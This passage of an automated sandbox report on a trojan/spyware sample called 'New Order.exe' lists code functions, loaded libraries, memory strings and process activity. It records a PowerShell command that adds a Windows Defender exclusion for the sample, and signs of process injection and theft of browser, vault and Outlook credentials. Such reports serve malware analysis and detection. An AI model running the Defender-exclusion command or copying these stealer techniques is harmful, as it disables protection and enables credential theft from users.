                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033BE3F014_2_033BE3F0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0345027414_2_03450274
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_034302C014_2_034302C0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0343815814_2_03438158
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033A010014_2_033A0100
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0344A11814_2_0344A118
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_034681CC14_2_034681CC
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_034641A214_2_034641A2
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_034701AA14_2_034701AA
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0344200014_2_03442000
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033B077014_2_033B0770
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033D475014_2_033D4750
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033AC7C014_2_033AC7C0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033CC6E014_2_033CC6E0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033B053514_2_033B0535
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0347059114_2_03470591
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0346244614_2_03462446
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0345442014_2_03454420
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0345E4F614_2_0345E4F6
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0346AB4014_2_0346AB40
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_03466BD714_2_03466BD7
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033AEA8014_2_033AEA80
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033C696214_2_033C6962
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033B29A014_2_033B29A0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0347A9A614_2_0347A9A6
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033B284014_2_033B2840
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033BA84014_2_033BA840
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033968B814_2_033968B8
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033DE8F014_2_033DE8F0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_03424F4014_2_03424F40
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033D0F3014_2_033D0F30
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033F2F2814_2_033F2F28
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_03452F3014_2_03452F30
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033BCFE014_2_033BCFE0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0342EFA014_2_0342EFA0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033A2FC814_2_033A2FC8
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0346EE2614_2_0346EE26
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033B0E5914_2_033B0E59
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0346EEDB14_2_0346EEDB
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033C2E9014_2_033C2E90
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0346CE9314_2_0346CE93
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033BAD0014_2_033BAD00
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0344CD1F14_2_0344CD1F
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033C8DBF14_2_033C8DBF
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033AADE014_2_033AADE0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033B0C0014_2_033B0C00
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033A0CF214_2_033A0CF2
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_03450CB514_2_03450CB5
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0346132D14_2_0346132D
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0339D34C14_2_0339D34C
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033F739A14_2_033F739A
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033B52A014_2_033B52A0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_034512ED14_2_034512ED
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033CB2C014_2_033CB2C0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0347B16B14_2_0347B16B
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0339F17214_2_0339F172
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033E516C14_2_033E516C
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033BB1B014_2_033BB1B0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0345F0CC14_2_0345F0CC
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0346F0E014_2_0346F0E0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_034670E914_2_034670E9
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033B70C014_2_033B70C0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0346F7B014_2_0346F7B0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_034616CC14_2_034616CC
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0346757114_2_03467571
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0344D5B014_2_0344D5B0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033A146014_2_033A1460
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0346F43F14_2_0346F43F
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0346FB7614_2_0346FB76
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_03425BF014_2_03425BF0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033CFB8014_2_033CFB80
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033EDBF914_2_033EDBF9
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_03467A4614_2_03467A46
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0346FA4914_2_0346FA49
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_03423A6C14_2_03423A6C
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0345DAC614_2_0345DAC6
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033F5AA014_2_033F5AA0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_03451AA314_2_03451AA3
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0344DAAC14_2_0344DAAC
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0344591014_2_03445910
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033B995014_2_033B9950
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033CB95014_2_033CB950
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0341D80014_2_0341D800
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033B38E014_2_033B38E0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0346FF0914_2_0346FF09
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033B1F9214_2_033B1F92
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0346FFB114_2_0346FFB1
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033B9EB014_2_033B9EB0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_03461D5A14_2_03461D5A
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_03467D7314_2_03467D73
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033B3D4014_2_033B3D40
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033CFDC014_2_033CFDC0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_03429C3214_2_03429C32
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0346FCF214_2_0346FCF2
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_009624D014_2_009624D0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0097C39014_2_0097C390
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0095D37014_2_0095D370
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0095D36914_2_0095D369
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0095D59014_2_0095D590
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0095B57014_2_0095B570
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0095B6B414_2_0095B6B4
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0095B6C014_2_0095B6C0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_00965BC014_2_00965BC0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_00963DBB14_2_00963DBB
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_00963DC014_2_00963DC0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0328E3E814_2_0328E3E8
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0328E50314_2_0328E503
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0328D96814_2_0328D968
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0328E89C14_2_0328E89C
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: String function: 0339B970 appears 280 times
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: String function: 033E5130 appears 58 times
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: String function: 0342F290 appears 105 times
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: String function: 033F7E54 appears 102 times
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: String function: 0341EA12 appears 86 times
                Source: C:\Users\user\Desktop\New Order.exeCode function: String function: 0188F290 appears 105 times
                Source: C:\Users\user\Desktop\New Order.exeCode function: String function: 01857E54 appears 102 times
                Source: C:\Users\user\Desktop\New Order.exeCode function: String function: 017FB970 appears 280 times
                Source: C:\Users\user\Desktop\New Order.exeCode function: String function: 0187EA12 appears 86 times
                Source: C:\Users\user\Desktop\New Order.exeCode function: String function: 01845130 appears 58 times
                Source: New Order.exe, 00000001.00000002.2168677711.0000000002F72000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs New Order.exe
                Source: New Order.exe, 00000001.00000002.2182298168.0000000007400000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs New Order.exe
                Source: New Order.exe, 00000001.00000000.2152803183.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameTWXA.exe0 vs New Order.exe
                Source: New Order.exe, 00000001.00000002.2167988143.00000000011EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs New Order.exe
                Source: New Order.exe, 00000001.00000002.2181124789.00000000059B0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs New Order.exe
                Source: New Order.exe, 00000001.00000002.2181175394.00000000059D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShell.EXEj% vs New Order.exe
                Source: New Order.exe, 00000008.00000002.2489535674.00000000018FD000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs New Order.exe
                Source: New Order.exe, 00000008.00000002.2488836600.0000000001367000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamew32time.dllj% vs New Order.exe
                Source: New Order.exeBinary or memory string: OriginalFilenameTWXA.exe0 vs New Order.exe
                Source: New Order.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: New Order.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 1.2.New Order.exe.4006340.0.raw.unpack, M7cDBeDIldQIV71LRd.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 1.2.New Order.exe.4006340.0.raw.unpack, M7cDBeDIldQIV71LRd.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 1.2.New Order.exe.4006340.0.raw.unpack, M7cDBeDIldQIV71LRd.csSecurity API names: _0020.AddAccessRule
                Source: 1.2.New Order.exe.7400000.4.raw.unpack, KXOu74t9GvIK3VBWFs.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 1.2.New Order.exe.7400000.4.raw.unpack, M7cDBeDIldQIV71LRd.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 1.2.New Order.exe.7400000.4.raw.unpack, M7cDBeDIldQIV71LRd.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 1.2.New Order.exe.7400000.4.raw.unpack, M7cDBeDIldQIV71LRd.csSecurity API names: _0020.AddAccessRule
                Source: 1.2.New Order.exe.4006340.0.raw.unpack, KXOu74t9GvIK3VBWFs.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@12/7@20/13
                Source: C:\Users\user\Desktop\New Order.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\New Order.exe.logJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7172:120:WilError_03
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pfobkdz1.5zi.ps1Jump to behavior
                Source: New Order.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: New Order.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\New Order.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: w32tm.exe, 0000000E.00000003.2689823843.0000000000A73000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000003.2687510954.0000000000A69000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4631373048.0000000000A96000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000003.2687377394.0000000000A48000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4631373048.0000000000A69000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: New Order.exeReversingLabs: Detection: 57%
                Source: unknownProcess created: C:\Users\user\Desktop\New Order.exe "C:\Users\user\Desktop\New Order.exe"
                Source: C:\Users\user\Desktop\New Order.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Order.exe"
                Source: C:\Users\user\Desktop\New Order.exeProcess created: C:\Users\user\Desktop\New Order.exe "C:\Users\user\Desktop\New Order.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\New Order.exeProcess created: C:\Users\user\Desktop\New Order.exe "C:\Users\user\Desktop\New Order.exe"
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exeProcess created: C:\Windows\SysWOW64\w32tm.exe "C:\Windows\SysWOW64\w32tm.exe"
                Source: C:\Windows\SysWOW64\w32tm.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\New Order.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Order.exe"Jump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess created: C:\Users\user\Desktop\New Order.exe "C:\Users\user\Desktop\New Order.exe"Jump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess created: C:\Users\user\Desktop\New Order.exe "C:\Users\user\Desktop\New Order.exe"Jump to behavior
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exeProcess created: C:\Windows\SysWOW64\w32tm.exe "C:\Windows\SysWOW64\w32tm.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\New Order.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeSection loaded: logoncli.dllJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeSection loaded: ntdsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\New Order.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
